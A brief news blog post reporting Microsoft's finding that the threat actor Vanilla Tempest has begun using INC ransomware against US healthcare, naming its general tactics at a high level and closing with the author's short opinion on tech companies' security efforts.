By 
Vanilla Tempest deploys the new INC ransomware strain
Microsoft has identified a new ransomware campaign by Vanilla Tempest.
The attackers exploit GootLoader infections, followed by lateral movement via Remote Desktop Protocol (RDP) and Windows Management Instrumentation (WMI) to deploy ransomware. These techniques help attackers gain deeper control and execute the ransomware payload across the network.
Vanilla Tempest, has been active since at least 2022. They are known for leveraging existing ransomware like BlackCat and Quantum Locker, and now use Azure tools such as Storage Explorer and AzCopy to exfiltrate data, increasing the complexity of their operations.
Microsoft threat intelligence on X:
Microsoft observed the financially motivated threat actor tracked as Vanilla Tempest using INC ransomware for the first time to target the healthcare sector in the United States. pic.twitter.com/WnnZvGODjV
— Microsoft Threat Intelligence (@MsftSecIntel) September 18, 2024
Opinion
It could be that I’m just on the lookout for positive news (likely), but it seems like tech giants are finally taking privacy and cybersecurity more seriously. Google is also stepping up with stronger security measures. Perhaps the massive financial repercussions from recent lawsuits are pushing them to prioritize these issues more aggressively?
Source: https://thehackernews.com/2024/09/microsoft-warns-of-new-inc-ransomware.html
Image by fernando zhiminaicela from Pixabay.